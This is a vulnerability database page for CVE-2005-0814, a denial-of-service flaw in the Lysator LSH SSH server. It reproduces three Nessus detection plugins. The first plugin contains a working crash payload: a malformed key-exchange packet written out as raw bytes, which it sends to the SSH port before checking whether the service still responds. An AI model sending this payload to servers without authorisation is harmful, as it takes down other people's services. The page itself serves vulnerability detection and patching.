Vulnerabilities > CVE-2005-0814 - Unspecified vulnerability in Lysator LSH

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
lysator
nessus

Summary

Unknown vulnerability in lshd in Lysator LSH 1.x and 2.x before 2.0.1 allows remote attackers to cause a denial of service via unknown vectors.

Nessus

  • NASL familyDenial of Service
    NASL idLSH_DOS.NASL
    descriptionThe remote host is running Lysator
    last seen2020-06-01
    modified2020-06-02
    plugin id17352
    published2005-03-17
    reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/17352
    titleLSH lshd parse_kexinit() Function Malformed Key Exchange Message Remote DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    if(description)
    {
     script_id(17352);
     script_version ("1.11");
     script_cve_id("CVE-2005-0814");
     script_bugtraq_id(12829);
     
     script_name(english:"LSH lshd parse_kexinit() Function Malformed Key Exchange Message Remote DoS");
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote SSH server is affected by a denial of service 
    vulnerability." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running Lysator's LSH, a version of Secure Shell
    (SSH) that is available for Unix-like platforms. This version of LSH
    is reportedly vulnerable to a denial of service attack.
    
    An attacker can exploit this issue by sending a malformed key exchange
    message." );
     script_set_attribute(attribute:"see_also", value:"http://lists.lysator.liu.se/pipermail/lsh-bugs/2005q1/000328.html" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to LSH 2.0.1 or later." );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"false");
    	
     script_set_attribute(attribute:"plugin_publication_date", value: "2005/03/17");
     script_set_attribute(attribute:"vuln_publication_date", value: "2005/03/16");
     script_cvs_date("Date: 2018/07/14  1:59:35");
    script_set_attribute(attribute:"plugin_type", value:"remote");
     script_set_attribute(attribute:"cpe",value:"cpe:/a:lysator:lsh");
    script_end_attributes();
    
     
     script_summary(english:"Checks for the remote LSH version");
     script_category(ACT_MIXED_ATTACK);
     script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
     script_family(english:"Denial of Service");
     script_dependencie("ssh_detect.nasl");
     script_require_ports("Services/ssh", 22);
     exit(0);
    }
    
    #
    # The script code starts here
    #
    
    port = get_kb_item("Services/ssh");
    if(!port)port = 22;
    
    banner = get_kb_item("SSH/banner/" + port );
    if ( ! banner ) exit(0);
    
    if ( "openssh" >< tolower(banner) ) exit(0);
    
    if (safe_checks())
    {
     if(ereg(string:banner,
      	pattern:"SSH-2.0-lshd-([01]\..*|2\.0) lsh", icase:TRUE)) security_warning(port);
     exit (0);
    }
    
    req = raw_string (
     0x00, 0x00, 0x00, 0xbc, 0x07, 0x14, 0xc1, 0x5f,
     0x45, 0x27, 0x3d, 0x6c, 0x16, 0x7b, 0xf9, 0xc2, 0xca, 0x39, 0x08, 0x61, 0x3b, 0x5a, 0x00, 0x00,
     0x00, 0x3d, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
     0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
     0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c,
     0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00,
     0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, 0x64,
     0x73, 0x73, 0x00, 0x00, 0x00, 0x0c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63,
     0x62, 0x63, 0x00, 0x00, 0x00, 0x0c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63,
     0x62, 0x63, 0x00, 0x00, 0x00, 0x09, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00,
     0x00, 0x00, 0x09, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00, 0x00, 0x00, 0x04,
     0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    );
    
    if (!get_port_state(port)) exit(0);
    
    soc = open_sock_tcp (port);
    if (!soc)
      exit (0);
    
    buf = recv_line (socket:soc, length:1024);
    if (!buf && ("SSH-2.0-" >!< buf))
      exit (0);
    
    send (socket:soc, data:'SSH-2.0-Crash\n');
    buf = recv (socket:soc, length:4096);
    if (!buf)
      exit (0);
    
    send (socket:soc, data:req);
    close (soc);
    
    soc = open_sock_tcp (port);
    if (!soc)
      security_warning(port);
    else
      close (soc);
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_72CDF2AB5B8711DC812D0011098B2F36.NASL
    descriptionSecunia reports : A vulnerability has been reported in LSH, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).
    last seen2020-06-01
    modified2020-06-02
    plugin id29874
    published2008-01-08
    reporterThis script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/29874
    titleFreeBSD : lsh -- multiple vulnerabilities (72cdf2ab-5b87-11dc-812d-0011098b2f36)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(29874);
      script_version("1.13");
      script_cvs_date("Date: 2019/08/02 13:32:39");
    
      script_cve_id("CVE-2003-0826", "CVE-2005-0814");
      script_xref(name:"Secunia", value:"14609");
    
      script_name(english:"FreeBSD : lsh -- multiple vulnerabilities (72cdf2ab-5b87-11dc-812d-0011098b2f36)");
      script_summary(english:"Checks for updated package in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote FreeBSD host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Secunia reports :
    
    A vulnerability has been reported in LSH, which potentially can be
    exploited by malicious people to cause a DoS (Denial of Service)."
      );
      # https://vuxml.freebsd.org/freebsd/72cdf2ab-5b87-11dc-812d-0011098b2f36.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?b36d2dd2"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:lsh");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/03/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2007/09/05");
      script_set_attribute(attribute:"plugin_publication_date", value:"2008/01/08");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"lsh<2.0.1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-717.NASL
    descriptionSeveral security relevant problems have been discovered in lsh, the alternative secure shell v2 (SSH2) protocol server. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities : - CAN-2003-0826 Bennett Todd discovered a heap buffer overflow in lshd which could lead to the execution of arbitrary code. - CAN-2005-0814 Niels Moller discovered a denial of service condition in lshd.
    last seen2020-06-01
    modified2020-06-02
    plugin id18153
    published2005-04-28
    reporterThis script is Copyright (C) 2005-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/18153
    titleDebian DSA-717-1 : lsh-utils - buffer overflow, typo
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-717. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(18153);
      script_version("1.21");
      script_cvs_date("Date: 2019/08/02 13:32:18");
    
      script_cve_id("CVE-2003-0826", "CVE-2005-0814");
      script_xref(name:"DSA", value:"717");
    
      script_name(english:"Debian DSA-717-1 : lsh-utils - buffer overflow, typo");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several security relevant problems have been discovered in lsh, the
    alternative secure shell v2 (SSH2) protocol server. The Common
    Vulnerabilities and Exposures project identifies the following
    vulnerabilities :
    
      - CAN-2003-0826
        Bennett Todd discovered a heap buffer overflow in lshd
        which could lead to the execution of arbitrary code.
    
      - CAN-2005-0814
    
        Niels Moller discovered a denial of service condition
        in lshd."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=211662"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.debian.org/security/2005/dsa-717"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the lsh-server package.
    
    For the stable distribution (woody) these problems have been fixed in
    version 1.2.5-2woody3."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:lsh-utils");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2005/04/27");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/04/28");
      script_set_attribute(attribute:"vuln_publication_date", value:"2003/09/20");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"3.0", prefix:"lsh-client", reference:"1.2.5-2woody3")) flag++;
    if (deb_check(release:"3.0", prefix:"lsh-server", reference:"1.2.5-2woody3")) flag++;
    if (deb_check(release:"3.0", prefix:"lsh-utils", reference:"1.2.5-2woody3")) flag++;
    if (deb_check(release:"3.0", prefix:"lsh-utils-doc", reference:"1.2.5-2woody3")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");